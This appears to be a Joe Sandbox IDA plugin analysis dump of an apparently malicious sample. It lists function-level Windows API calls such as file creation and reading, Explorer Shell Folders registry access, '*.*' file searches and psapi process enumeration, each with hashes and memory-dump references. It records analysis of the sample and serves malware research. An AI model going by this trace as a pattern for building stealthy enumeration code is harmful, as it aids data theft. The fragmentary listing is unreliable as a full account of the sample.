                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                      APIs
                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                      • String ID:
                                                      • API String ID: 4232544981-0
                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                      APIs
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$FileModuleName
                                                      • String ID:
                                                      • API String ID: 3859505661-0
                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                      APIs
                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID:
                                                      • API String ID: 613200358-0
                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                      APIs
                                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: EnumNamesResource
                                                      • String ID:
                                                      • API String ID: 3334572018-0
                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                      APIs
                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CloseFind
                                                      • String ID:
                                                      • API String ID: 1863332320-0
                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                      • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                      APIs
                                                      • memset.MSVCRT ref: 004095FC
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 3655998216-0
                                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                      APIs
                                                      • memset.MSVCRT ref: 00445426
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                      • String ID:
                                                      • API String ID: 1828521557-0
                                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                      APIs
                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                      • String ID:
                                                      • API String ID: 2136311172-0
                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                      APIs
                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@
                                                      • String ID:
